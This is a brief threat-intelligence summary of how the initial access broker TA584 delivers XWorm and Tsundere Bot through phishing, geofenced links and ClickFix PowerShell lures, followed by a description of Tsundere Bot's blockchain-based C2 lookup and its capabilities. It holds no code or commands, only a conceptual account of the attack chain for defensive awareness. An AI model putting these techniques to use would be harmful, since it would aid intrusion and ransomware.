How TA584 Leverages Tsundere Bot and XWorm for Ransomware Attacks

Overview

TA584, a high‑activity Initial Access Broker (IAB), uses the Tsundere Bot and XWorm remote‑access trojans to obtain footholds that enable subsequent ransomware attacks.

Proofpoint has tracked TA584 since 2020. Activity volume doubled from the first quarter to the end of 2025, and the group expanded its target regions from North America, the UK and Ireland to Germany, other European countries, and Australia.

Tsundere Bot background

Tsundere Bot was first disclosed by Kaspersky last year and is linked to a Russian‑language threat group associated with the 123 Stealer stealer. Although the original infection vector is unclear, the malware can be used for information gathering, data theft, lateral movement, and deployment of additional payloads.

Attack chain

The current chain begins with hundreds of compromised legacy email accounts that send phishing messages via SendGrid and Amazon SES. Each email contains a target‑specific link protected by geofencing and IP‑filtering, often routed through third‑party traffic distributors such as Keitaro.

Victims that pass the filters are presented with a CAPTCHA page, then redirected to a ClickFix page that prompts execution of a PowerShell command.

The PowerShell command downloads and runs an obfuscated script, which loads either XWorm or Tsundere Bot directly into memory while silently redirecting the browser to a legitimate site to mask the malicious activity.

Payloads observed

Proofpoint lists numerous payloads previously used by TA584, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT—the latter still observed in a 2025 incident.

Tsundere Bot architecture

Tsundere Bot is a Malware‑as‑a‑Service platform built on Node.js. Its installer is generated by a C2 panel and automatically deploys to victims.

The malware employs an enhanced EtherHiding technique to retrieve C2 server addresses from the Ethereum blockchain, with hard‑coded fallback addresses in case the primary endpoint fails.

Communication with the C2 server occurs over WebSocket. The malware includes system‑region detection logic: if the device uses a CIS member language (primarily Russian), execution terminates.

It gathers system information to build a host profile, can execute arbitrary JavaScript from the C2 server, functions as a SOCKS proxy, and hosts an internal marketplace for buying and selling trojan binaries.

Reference

https://www.bleepingcomputer.com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/